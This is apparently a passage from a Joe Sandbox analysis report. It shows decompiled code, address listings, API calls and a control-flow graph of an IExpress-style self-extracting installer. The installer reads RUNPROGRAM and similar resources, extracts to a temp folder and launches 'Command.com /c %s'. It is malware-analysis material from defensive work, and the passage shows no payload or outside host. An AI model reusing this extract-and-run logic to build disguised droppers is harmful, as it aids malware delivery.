                                                                                                                                                                                                    												goto L61;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												FreeLibrary();
                                                                                                                                                                                                    												_t127 = _v400;
                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags =  *0x179a40 - 1; // 0x3
                                                                                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                                                                                    											goto L37;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags =  *0x178a20;
                                                                                                                                                                                                    										if( *0x178a20 == 0) {
                                                                                                                                                                                                    											goto L37;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t157;
                                                                                                                                                                                                    										if(_t157 != 0) {
                                                                                                                                                                                                    											goto L38;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_v388 = 1;
                                                                                                                                                                                                    										E0017202A(_t146); // executed
                                                                                                                                                                                                    										goto L37;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t146 =  &_v280;
                                                                                                                                                                                                    									_t108 = E0017468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                    									__eflags = _t108;
                                                                                                                                                                                                    									if(_t108 == 0) {
                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *0x178c42;
                                                                                                                                                                                                    									if( *0x178c42 != 0) {
                                                                                                                                                                                                    										goto L69;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                    									__eflags = _t112 == 0;
                                                                                                                                                                                                    									if(_t112 == 0) {
                                                                                                                                                                                                    										goto L69;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L31;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t118 =  *0x178a38; // 0x0
                                                                                                                                                                                                    								if(_t118 == 0) {
                                                                                                                                                                                                    									L23:
                                                                                                                                                                                                    									if(_t153 != 0) {
                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t146 =  &_v276;
                                                                                                                                                                                                    									if(E0017468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                    										goto L27;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L25;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                    									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                    									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                    										goto L62;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t140 = "USRQCMD";
                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                    									_t146 =  &_v276;
                                                                                                                                                                                                    									if(E0017468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                    										_t153 = 1;
                                                                                                                                                                                                    										_v388 = 1;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t140 = "ADMQCMD";
                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L26:
                                                                                                                                                                                                    						_push(_t130);
                                                                                                                                                                                                    						_t146 = 0x104;
                                                                                                                                                                                                    						E00171781( &_v276, 0x104, _t130, 0x178c42);
                                                                                                                                                                                                    						goto L27;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t130 = "REBOOT";
                                                                                                                                                                                                    				_t125 = E0017468F(_t130, 0x179a2c, 4);
                                                                                                                                                                                                    				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                    					goto L25;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}





























































                                                                                                                                                                                                    0x00173baa
                                                                                                                                                                                                    0x00173bb0
                                                                                                                                                                                                    0x00173bb7
                                                                                                                                                                                                    0x00173bc0
                                                                                                                                                                                                    0x00173bc2
                                                                                                                                                                                                    0x00173bc9
                                                                                                                                                                                                    0x00173bcb
                                                                                                                                                                                                    0x00173bcf
                                                                                                                                                                                                    0x00173bd3
                                                                                                                                                                                                    0x00173bd9
                                                                                                                                                                                                    0x00173bfd
                                                                                                                                                                                                    0x00173bfd
                                                                                                                                                                                                    0x00173bff
                                                                                                                                                                                                    0x00173c03
                                                                                                                                                                                                    0x00173c03
                                                                                                                                                                                                    0x00173c11
                                                                                                                                                                                                    0x00173c16
                                                                                                                                                                                                    0x00173c19
                                                                                                                                                                                                    0x00173c28
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173c30
                                                                                                                                                                                                    0x00173c39
                                                                                                                                                                                                    0x00173c40
                                                                                                                                                                                                    0x00173d13
                                                                                                                                                                                                    0x00173d15
                                                                                                                                                                                                    0x00173d21
                                                                                                                                                                                                    0x00173d26
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173c4f
                                                                                                                                                                                                    0x00173c56
                                                                                                                                                                                                    0x00173c60
                                                                                                                                                                                                    0x00173c65
                                                                                                                                                                                                    0x00173c77
                                                                                                                                                                                                    0x00173c78
                                                                                                                                                                                                    0x00173c7c
                                                                                                                                                                                                    0x00173c7e
                                                                                                                                                                                                    0x00173c82
                                                                                                                                                                                                    0x00173c82
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173c7c
                                                                                                                                                                                                    0x00173c67
                                                                                                                                                                                                    0x00173c69
                                                                                                                                                                                                    0x00173c6d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173c58
                                                                                                                                                                                                    0x00173c58
                                                                                                                                                                                                    0x00173c6e
                                                                                                                                                                                                    0x00173c6e
                                                                                                                                                                                                    0x00173c87
                                                                                                                                                                                                    0x00173c89
                                                                                                                                                                                                    0x00173d4d
                                                                                                                                                                                                    0x00173d4f
                                                                                                                                                                                                    0x00173d50
                                                                                                                                                                                                    0x00173d52
                                                                                                                                                                                                    0x00173d9e
                                                                                                                                                                                                    0x00173da8
                                                                                                                                                                                                    0x00173daf
                                                                                                                                                                                                    0x00173db4
                                                                                                                                                                                                    0x00173db6
                                                                                                                                                                                                    0x00173f4d
                                                                                                                                                                                                    0x00173f4d
                                                                                                                                                                                                    0x00173f4f
                                                                                                                                                                                                    0x00173f56
                                                                                                                                                                                                    0x00173f57
                                                                                                                                                                                                    0x00173f58
                                                                                                                                                                                                    0x00173f63
                                                                                                                                                                                                    0x00173f63
                                                                                                                                                                                                    0x00173dbc
                                                                                                                                                                                                    0x00173dc0
                                                                                                                                                                                                    0x00173dc2
                                                                                                                                                                                                    0x00173de6
                                                                                                                                                                                                    0x00173de6
                                                                                                                                                                                                    0x00173de8
                                                                                                                                                                                                    0x00173f0b
                                                                                                                                                                                                    0x00173f0b
                                                                                                                                                                                                    0x00173f0f
                                                                                                                                                                                                    0x00173f13
                                                                                                                                                                                                    0x00173f15
                                                                                                                                                                                                    0x00173f1a
                                                                                                                                                                                                    0x00173f1c
                                                                                                                                                                                                    0x00173f46
                                                                                                                                                                                                    0x00173f47
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173f47
                                                                                                                                                                                                    0x00173f1e
                                                                                                                                                                                                    0x00173f1f
                                                                                                                                                                                                    0x00173f25
                                                                                                                                                                                                    0x00173f26
                                                                                                                                                                                                    0x00173f2a
                                                                                                                                                                                                    0x00173f2d
                                                                                                                                                                                                    0x00173fd9
                                                                                                                                                                                                    0x00173fd9
                                                                                                                                                                                                    0x00173fda
                                                                                                                                                                                                    0x00173fda
                                                                                                                                                                                                    0x00173fe1
                                                                                                                                                                                                    0x00173fe3
                                                                                                                                                                                                    0x00173fe3
                                                                                                                                                                                                    0x00173fe8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173fe8
                                                                                                                                                                                                    0x00173f33
                                                                                                                                                                                                    0x00173f37
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173f37
                                                                                                                                                                                                    0x00173dee
                                                                                                                                                                                                    0x00173dee
                                                                                                                                                                                                    0x00173df5
                                                                                                                                                                                                    0x00173fad
                                                                                                                                                                                                    0x00173fb9
                                                                                                                                                                                                    0x00173fc2
                                                                                                                                                                                                    0x00173fc8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173fc8
                                                                                                                                                                                                    0x00173dfb
                                                                                                                                                                                                    0x00173dfd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173e03
                                                                                                                                                                                                    0x00173e0a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173e15
                                                                                                                                                                                                    0x00173e17
                                                                                                                                                                                                    0x00173e19
                                                                                                                                                                                                    0x00173f94
                                                                                                                                                                                                    0x00173fa4
                                                                                                                                                                                                    0x00173f7c
                                                                                                                                                                                                    0x00173f80
                                                                                                                                                                                                    0x00173f8b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173f8b
                                                                                                                                                                                                    0x00173e2c
                                                                                                                                                                                                    0x00173e30
                                                                                                                                                                                                    0x00173e34
                                                                                                                                                                                                    0x00173e36
                                                                                                                                                                                                    0x00173f69
                                                                                                                                                                                                    0x00173f6e
                                                                                                                                                                                                    0x00173f70
                                                                                                                                                                                                    0x00173f76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173f76
                                                                                                                                                                                                    0x00173e3c
                                                                                                                                                                                                    0x00173e43
                                                                                                                                                                                                    0x00173e47
                                                                                                                                                                                                    0x00173e52
                                                                                                                                                                                                    0x00173e56
                                                                                                                                                                                                    0x00173e5c
                                                                                                                                                                                                    0x00173e61
                                                                                                                                                                                                    0x00173e68
                                                                                                                                                                                                    0x00173e70
                                                                                                                                                                                                    0x00173e74
                                                                                                                                                                                                    0x00173e7c
                                                                                                                                                                                                    0x00173e80
                                                                                                                                                                                                    0x00173e82
                                                                                                                                                                                                    0x00173e82
                                                                                                                                                                                                    0x00173e87
                                                                                                                                                                                                    0x00173e87
                                                                                                                                                                                                    0x00173e8b
                                                                                                                                                                                                    0x00173e91
                                                                                                                                                                                                    0x00173e94
                                                                                                                                                                                                    0x00173e96
                                                                                                                                                                                                    0x00173e96
                                                                                                                                                                                                    0x00173e9b
                                                                                                                                                                                                    0x00173e9b
                                                                                                                                                                                                    0x00173e9f
                                                                                                                                                                                                    0x00173ea2
                                                                                                                                                                                                    0x00173ea4
                                                                                                                                                                                                    0x00173ea4
                                                                                                                                                                                                    0x00173ea9
                                                                                                                                                                                                    0x00173ea9
                                                                                                                                                                                                    0x00173ead
                                                                                                                                                                                                    0x00173eb3
                                                                                                                                                                                                    0x00173eb6
                                                                                                                                                                                                    0x00173eb8
                                                                                                                                                                                                    0x00173eb8
                                                                                                                                                                                                    0x00173ebd
                                                                                                                                                                                                    0x00173ebd
                                                                                                                                                                                                    0x00173ec1
                                                                                                                                                                                                    0x00173ec3
                                                                                                                                                                                                    0x00173ec5
                                                                                                                                                                                                    0x00173ec5
                                                                                                                                                                                                    0x00173eca
                                                                                                                                                                                                    0x00173eca
                                                                                                                                                                                                    0x00173ece
                                                                                                                                                                                                    0x00173ed5
                                                                                                                                                                                                    0x00173ed9
                                                                                                                                                                                                    0x00173ee0
                                                                                                                                                                                                    0x00173ee6
                                                                                                                                                                                                    0x00173eea
                                                                                                                                                                                                    0x00173eec
                                                                                                                                                                                                    0x00173eee
                                                                                                                                                                                                    0x00173ef3
                                                                                                                                                                                                    0x00173ef3
                                                                                                                                                                                                    0x00173ef5
                                                                                                                                                                                                    0x00173efa
                                                                                                                                                                                                    0x00173efb
                                                                                                                                                                                                    0x00173efd
                                                                                                                                                                                                    0x00173f40
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173eff
                                                                                                                                                                                                    0x00173eff
                                                                                                                                                                                                    0x00173f05
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173f05
                                                                                                                                                                                                    0x00173efd
                                                                                                                                                                                                    0x00173dc7
                                                                                                                                                                                                    0x00173dce
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173dd0
                                                                                                                                                                                                    0x00173dd7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173dd9
                                                                                                                                                                                                    0x00173ddb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173ddd
                                                                                                                                                                                                    0x00173de1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173de1
                                                                                                                                                                                                    0x00173d59
                                                                                                                                                                                                    0x00173d65
                                                                                                                                                                                                    0x00173d6a
                                                                                                                                                                                                    0x00173d6c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173d6e
                                                                                                                                                                                                    0x00173d75
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173d8f
                                                                                                                                                                                                    0x00173d96
                                                                                                                                                                                                    0x00173d98
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173d98
                                                                                                                                                                                                    0x00173c8f
                                                                                                                                                                                                    0x00173c98
                                                                                                                                                                                                    0x00173cf1
                                                                                                                                                                                                    0x00173cf3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173cfe
                                                                                                                                                                                                    0x00173d11
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173d11
                                                                                                                                                                                                    0x00173c9c
                                                                                                                                                                                                    0x00173ca5
                                                                                                                                                                                                    0x00173ca7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173cad
                                                                                                                                                                                                    0x00173cb2
                                                                                                                                                                                                    0x00173cb7
                                                                                                                                                                                                    0x00173cc5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173ce8
                                                                                                                                                                                                    0x00173cec
                                                                                                                                                                                                    0x00173ced
                                                                                                                                                                                                    0x00173ced
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173ce8
                                                                                                                                                                                                    0x00173c9e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173c9e
                                                                                                                                                                                                    0x00173c56
                                                                                                                                                                                                    0x00173d35
                                                                                                                                                                                                    0x00173d35
                                                                                                                                                                                                    0x00173d3c
                                                                                                                                                                                                    0x00173d48
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173d48
                                                                                                                                                                                                    0x00173c03
                                                                                                                                                                                                    0x00173be2
                                                                                                                                                                                                    0x00173be7
                                                                                                                                                                                                    0x00173bee
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00173C11
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00173CDC
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
                                                                                                                                                                                                      • Part of subcall function 0017468F: SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
                                                                                                                                                                                                      • Part of subcall function 0017468F: LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
                                                                                                                                                                                                      • Part of subcall function 0017468F: LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
                                                                                                                                                                                                      • Part of subcall function 0017468F: memcpy_s.MSVCRT ref: 001746E5
                                                                                                                                                                                                      • Part of subcall function 0017468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00178C42), ref: 00173D8F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00173E26
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00178C42), ref: 00173EFF
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00178C42), ref: 00173F1F
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00178C42), ref: 00173F40
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00178C42), ref: 00173F47
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00178C42), ref: 00173F76
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00178C42), ref: 00173F80
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00178C42), ref: 00173FC2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                    • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$nst0dum
                                                                                                                                                                                                    • API String ID: 1032054927-1170992343
                                                                                                                                                                                                    • Opcode ID: 7876ae0a282d3a51085a66f9fe3f49ad7379efbd3af3c2d30fcc79f00d129fae
                                                                                                                                                                                                    • Instruction ID: e4f46227b4866b30b52ab57ca4c74ead2dbdc955fc15dad6b569499ca835e2ea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7876ae0a282d3a51085a66f9fe3f49ad7379efbd3af3c2d30fcc79f00d129fae
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5B10170A483019BD730DF64C849B6B76F4EB94750F10892EFAADD3191DB70CA84EB92
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 141 171ae8-171b2c call 171680 144 171b2e-171b39 141->144 145 171b3b-171b40 141->145 146 171b46-171b61 call 171a84 144->146 145->146 149 171b63-171b65 146->149 150 171b9f-171bc2 call 171781 call 17658a 146->150 152 171b68-171b6d 149->152 157 171bc7-171bd3 call 1766c8 150->157 152->152 154 171b6f-171b74 152->154 154->150 156 171b76-171b7b 154->156 158 171b83-171b86 156->158 159 171b7d-171b81 156->159 166 171d73-171d7f call 1766c8 157->166 167 171bd9-171bf1 CompareStringA 157->167 158->150 162 171b88-171b8a 158->162 159->158 161 171b8c-171b9d call 171680 159->161 161->157 162->150 162->161 175 171d81-171d99 CompareStringA 166->175 176 171df8-171e09 LocalAlloc 166->176 167->166 168 171bf7-171c07 GetFileAttributesA 167->168 170 171d53-171d5e 168->170 171 171c0d-171c15 168->171 173 171d64-171d6e call 1744b9 170->173 171->170 174 171c1b-171c33 call 171a84 171->174 188 171e94-171ea4 call 176ce0 173->188 190 171c35-171c38 174->190 191 171c50-171c61 LocalAlloc 174->191 175->176 181 171d9b-171da2 175->181 178 171dd4-171ddf 176->178 179 171e0b-171e1b GetFileAttributesA 176->179 178->173 183 171e67-171e73 call 171680 179->183 184 171e1d-171e1f 179->184 186 171da5-171daa 181->186 195 171e78-171e84 call 172aac 183->195 184->183 189 171e21-171e3e call 171781 184->189 186->186 192 171dac-171db4 186->192 189->195 211 171e40-171e43 189->211 198 171c40-171c4b call 171a84 190->198 199 171c3a 190->199 191->178 194 171c67-171c72 191->194 193 171db7-171dbc 192->193 193->193 200 171dbe-171dd2 LocalAlloc 193->200 202 171c74 194->202 203 171c79-171cc0 GetPrivateProfileIntA GetPrivateProfileStringA 194->203 210 171e89-171e92 195->210 198->191 199->198 200->178 207 171de1-171df3 call 17171e 200->207 202->203 208 171cc2-171ccc 203->208 209 171cf8-171d07 203->209 207->210 213 171cd3-171cf3 call 171680 * 2 208->213 214 171cce 208->214 216 171d23 209->216 217 171d09-171d21 GetShortPathNameA 209->217 210->188 211->195 215 171e45-171e65 call 1716b3 * 2 211->215 213->210 214->213 215->195 218 171d28-171d2b 216->218 217->218 222 171d32-171d4e call 17171e 218->222 223 171d2d 218->223 222->210 223->222
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00171AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v527;
                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                    				char _v1552;
                                                                                                                                                                                                    				CHAR* _v1556;
                                                                                                                                                                                                    				int* _v1560;
                                                                                                                                                                                                    				CHAR** _v1564;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                                                    				CHAR* _t53;
                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                    				char* _t57;
                                                                                                                                                                                                    				char* _t58;
                                                                                                                                                                                                    				CHAR* _t60;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				signed char _t65;
                                                                                                                                                                                                    				intOrPtr _t76;
                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                    				unsigned int _t85;
                                                                                                                                                                                                    				CHAR* _t90;
                                                                                                                                                                                                    				CHAR* _t92;
                                                                                                                                                                                                    				char _t105;
                                                                                                                                                                                                    				char _t106;
                                                                                                                                                                                                    				CHAR** _t111;
                                                                                                                                                                                                    				CHAR* _t115;
                                                                                                                                                                                                    				intOrPtr* _t125;
                                                                                                                                                                                                    				void* _t126;
                                                                                                                                                                                                    				CHAR* _t132;
                                                                                                                                                                                                    				CHAR* _t135;
                                                                                                                                                                                                    				void* _t138;
                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                    				void* _t145;
                                                                                                                                                                                                    				intOrPtr* _t146;
                                                                                                                                                                                                    				char* _t148;
                                                                                                                                                                                                    				CHAR* _t151;
                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                    				CHAR* _t155;
                                                                                                                                                                                                    				CHAR* _t156;
                                                                                                                                                                                                    				void* _t157;
                                                                                                                                                                                                    				signed int _t158;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t48 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                    				_t108 = __ecx;
                                                                                                                                                                                                    				_v1564 = _a4;
                                                                                                                                                                                                    				_v1560 = _a8;
                                                                                                                                                                                                    				E00171680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                    				if(_v528 != 0x22) {
                                                                                                                                                                                                    					_t135 = " ";
                                                                                                                                                                                                    					_t53 =  &_v528;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t135 = "\"";
                                                                                                                                                                                                    					_t53 =  &_v527;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t111 =  &_v1556;
                                                                                                                                                                                                    				_v1556 = _t53;
                                                                                                                                                                                                    				_t54 = E00171A84(_t111, _t135);
                                                                                                                                                                                                    				_t156 = _v1556;
                                                                                                                                                                                                    				_t151 = _t54;
                                                                                                                                                                                                    				if(_t156 == 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_push(_t111);
                                                                                                                                                                                                    					E00171781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                    					E0017658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t132 = _t156;
                                                                                                                                                                                                    					_t148 =  &(_t132[1]);
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t105 =  *_t132;
                                                                                                                                                                                                    						_t132 =  &(_t132[1]);
                                                                                                                                                                                                    					} while (_t105 != 0);
                                                                                                                                                                                                    					_t111 = _t132 - _t148;
                                                                                                                                                                                                    					if(_t111 < 3) {
                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t106 = _t156[1];
                                                                                                                                                                                                    					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                    						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						E00171680( &_v268, 0x104, _t156);
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						_t138 = 0x2e;
                                                                                                                                                                                                    						_t57 = E001766C8(_t156, _t138);
                                                                                                                                                                                                    						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                    							_t139 = 0x2e;
                                                                                                                                                                                                    							_t115 = _t156;
                                                                                                                                                                                                    							_t58 = E001766C8(_t115, _t139);
                                                                                                                                                                                                    							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                    								if(_t156 == 0) {
                                                                                                                                                                                                    									goto L43;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                    								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                    									E00171680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_push(_t115);
                                                                                                                                                                                                    									_t108 = 0x400;
                                                                                                                                                                                                    									E00171781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                    									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                    										E001716B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                    										E001716B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t140 = _t156;
                                                                                                                                                                                                    								 *_t156 = 0;
                                                                                                                                                                                                    								E00172AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                    								goto L53;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t108 = "Command.com /c %s";
                                                                                                                                                                                                    								_t125 = "Command.com /c %s";
                                                                                                                                                                                                    								_t145 = _t125 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t76 =  *_t125;
                                                                                                                                                                                                    									_t125 = _t125 + 1;
                                                                                                                                                                                                    								} while (_t76 != 0);
                                                                                                                                                                                                    								_t126 = _t125 - _t145;
                                                                                                                                                                                                    								_t146 =  &_v268;
                                                                                                                                                                                                    								_t157 = _t146 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t77 =  *_t146;
                                                                                                                                                                                                    									_t146 = _t146 + 1;
                                                                                                                                                                                                    								} while (_t77 != 0);
                                                                                                                                                                                                    								_t140 = _t146 - _t157;
                                                                                                                                                                                                    								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                    								if(_t156 != 0) {
                                                                                                                                                                                                    									E0017171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                    									goto L53;
                                                                                                                                                                                                    								}
